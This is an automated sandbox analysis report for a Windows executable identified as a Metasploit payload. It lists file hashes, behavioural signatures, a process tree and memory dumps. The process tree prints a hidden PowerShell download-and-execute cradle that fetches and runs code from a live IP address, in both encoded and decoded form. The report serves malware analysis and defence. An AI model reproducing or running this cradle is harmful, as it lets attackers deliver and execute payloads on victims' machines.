Analysis
- max time kernel: 93s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 08-07-2022 20:02

Static task: static1

Behavioral task: behavioral1
  Sample: c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
  Resource: win7-20220414-en

Behavioral task: behavioral2
  Sample: c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
  Resource: win10v2004-20220414-en

General
- Target: c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
- Size: 28KB
- MD5: 2604e69479154e5d7ddc00115706ef0f
- SHA1: 66c3a2ca32c785a3e3850354388e9259b5a8feb4
- SHA256: c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63
- SHA512: 9d6a4d5bf57d24375e991092575ce4fcc7ffa6302adf72ff584abbc3de9d4a7b14be7cfdedfc7d2f5adf41d2268f4e8744b7d02a5eb59efda5a47d6665dea3d6
Malware Config
- Extracted: http://45.32.16.170:80/a
Signatures
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
    33 | 4408 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid | process):
    1560 | powershell.exe
    1560 | powershell.exe
    4408 | powershell.exe
    4408 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1560 | powershell.exe
    Token: SeDebugPrivilege | 4408 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description | pid | process | target process):
    PID 4768 wrote to memory of 1560 | 4768 | c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe | powershell.exe
    PID 4768 wrote to memory of 1560 | 4768 | c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe | powershell.exe
    PID 4768 wrote to memory of 1560 | 4768 | c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe | powershell.exe
    PID 1560 wrote to memory of 4408 | 1560 | powershell.exe | powershell.exe
    PID 1560 wrote to memory of 4408 | 1560 | powershell.exe | powershell.exe
    PID 1560 wrote to memory of 4408 | 1560 | powershell.exe | powershell.exe
Processes (process tree; child processes are indented under their parent)
1. C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEANgAuADEANwAwADoAOAAwAC8AYQAnACkAKQAiAA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://45.32.16.170:80/a'))"
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 6195a91754effb4df74dbc72cdf4f7a6
  SHA1: aba262f5726c6d77659fe0d3195e36a85046b427
  SHA256: 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
  SHA512: ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 11KB
  MD5: 8d19b0dcdb54679f4470f3c2b6ffb7ad
  SHA1: 3f10a4163430fc7af30b7c57a1b89315f88ea479
  SHA256: bafea111054a0004cbf26afac12e150ca52d34c6a0957f4997c4d68e97d31b1b
  SHA512: 7844e974592f18af89d15c2281b5f187cd638bca373edf4b8af68182885e24d96612ecb9cbc1e295a84f9816f22896c5185271beefcb9054c9af50baf2e4c68c
- memory/1560-136-0x0000000004E70000-0x0000000004ED6000-memory.dmp
  Filesize: 408KB
- memory/1560-133-0x0000000004F90000-0x00000000055B8000-memory.dmp
  Filesize: 6.2MB
- memory/1560-134-0x0000000004C30000-0x0000000004C52000-memory.dmp
  Filesize: 136KB
- memory/1560-135-0x0000000004D50000-0x0000000004DB6000-memory.dmp
  Filesize: 408KB
- memory/1560-137-0x0000000004F70000-0x0000000004F8E000-memory.dmp
  Filesize: 120KB
- memory/1560-132-0x0000000002710000-0x0000000002746000-memory.dmp
  Filesize: 216KB
- memory/1560-131-0x0000000000000000-mapping.dmp
- memory/4408-138-0x0000000000000000-mapping.dmp
- memory/4408-139-0x0000000008110000-0x000000000878A000-memory.dmp
  Filesize: 6.5MB
- memory/4408-140-0x0000000006CB0000-0x0000000006CCA000-memory.dmp
  Filesize: 104KB
- memory/4768-130-0x0000000000400000-0x0000000000412000-memory.dmp
  Filesize: 72KB
- memory/4768-143-0x0000000000400000-0x0000000000412000-memory.dmp
  Filesize: 72KB